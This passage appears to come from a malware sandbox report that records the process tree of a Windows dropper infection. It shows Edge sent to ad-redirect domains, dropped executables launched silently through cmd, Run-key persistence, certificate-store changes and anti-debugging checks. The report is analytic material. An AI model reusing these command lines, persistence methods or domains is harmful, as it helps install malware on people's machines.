C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
10⤵
PID:4776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
10⤵
PID:7016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:8
10⤵
PID:2840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
10⤵
PID:6660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
10⤵
PID:6480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
10⤵
PID:3584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
10⤵
PID:6236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
10⤵
PID:784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
10⤵
PID:2016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
10⤵
PID:5384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
10⤵
PID:2268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1732 /prefetch:1
10⤵
PID:7028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:8
10⤵
PID:4684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
10⤵
PID:5340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
10⤵
PID:1192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1676 /prefetch:1
10⤵
PID:1640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1
10⤵
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
10⤵
PID:2184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
10⤵
PID:5464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1
10⤵
PID:3412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
10⤵
PID:4508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
10⤵
PID:5028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
10⤵
PID:1604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3912 /prefetch:8
10⤵
PID:5944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1412 /prefetch:1
10⤵
PID:3528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
10⤵
PID:4260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
10⤵
PID:1676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=4916 /prefetch:8
10⤵
PID:6440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5976 /prefetch:8
10⤵
PID:6544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:8
10⤵
PID:3520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
10⤵
PID:6840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1
10⤵
PID:5372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
10⤵
PID:4364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
10⤵
PID:884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
10⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
10⤵
PID:6076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
10⤵
PID:4168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
10⤵
PID:2020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
9⤵
PID:5712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:5484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
9⤵
PID:5812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
9⤵
PID:656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:2016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
9⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:2200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
9⤵
PID:2784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:4468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
9⤵
PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:2964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
9⤵
PID:6456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\be-dba4d-4cd-4f9b8-cb64570309d36\Sojaeselyno.exe
"C:\Users\Admin\AppData\Local\Temp\be-dba4d-4cd-4f9b8-cb64570309d36\Sojaeselyno.exe"
8⤵
- Executes dropped EXE
PID:5572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b4yfy4w0.3is\GcleanerEU.exe /eufive & exit
9⤵
PID:2896

C:\Users\Admin\AppData\Local\Temp\b4yfy4w0.3is\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\b4yfy4w0.3is\GcleanerEU.exe /eufive
10⤵
- Executes dropped EXE
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 236
11⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j1env1nj.bw0\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\j1env1nj.bw0\installer.exe
C:\Users\Admin\AppData\Local\Temp\j1env1nj.bw0\installer.exe /qn CAMPAIGN="654"
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1440

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\j1env1nj.bw0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\j1env1nj.bw0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632504693 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
11⤵
- Enumerates connected drives
PID:6680

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0x04hy42.wnf\anyname.exe & exit
9⤵
PID:6704

C:\Users\Admin\AppData\Local\Temp\0x04hy42.wnf\anyname.exe
C:\Users\Admin\AppData\Local\Temp\0x04hy42.wnf\anyname.exe
10⤵
- Executes dropped EXE
PID:1204

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gglyfox0.ygu\gcleaner.exe /mixfive & exit
9⤵
PID:5580

C:\Users\Admin\AppData\Local\Temp\gglyfox0.ygu\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\gglyfox0.ygu\gcleaner.exe /mixfive
10⤵
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 236
11⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f3rjlgml.pl4\autosubplayer.exe /S & exit
9⤵
- Suspicious use of SetWindowsHookEx
PID:5176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1574d7b3751ed.exe /mixone
4⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri1574d7b3751ed.exe
Fri1574d7b3751ed.exe /mixone
5⤵
- Executes dropped EXE
PID:2928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 244
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri159afce91b41.exe
4⤵
PID:4012

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri159afce91b41.exe
Fri159afce91b41.exe
5⤵
- Executes dropped EXE
PID:5180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15517df7a88264b6.exe
4⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15517df7a88264b6.exe
Fri15517df7a88264b6.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 2020
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri157e966e73fe.exe
4⤵
PID:5052

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri157e966e73fe.exe
Fri157e966e73fe.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3592

C:\Users\Admin\AppData\Roaming\2307435.scr
"C:\Users\Admin\AppData\Roaming\2307435.scr" /S
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5652

C:\Users\Admin\AppData\Roaming\2228814.scr
"C:\Users\Admin\AppData\Roaming\2228814.scr" /S
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5740

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
7⤵
- Executes dropped EXE
PID:1776

C:\Users\Admin\AppData\Roaming\6748306.scr
"C:\Users\Admin\AppData\Roaming\6748306.scr" /S
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5932

C:\Users\Admin\AppData\Roaming\2517325.scr
"C:\Users\Admin\AppData\Roaming\2517325.scr" /S
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
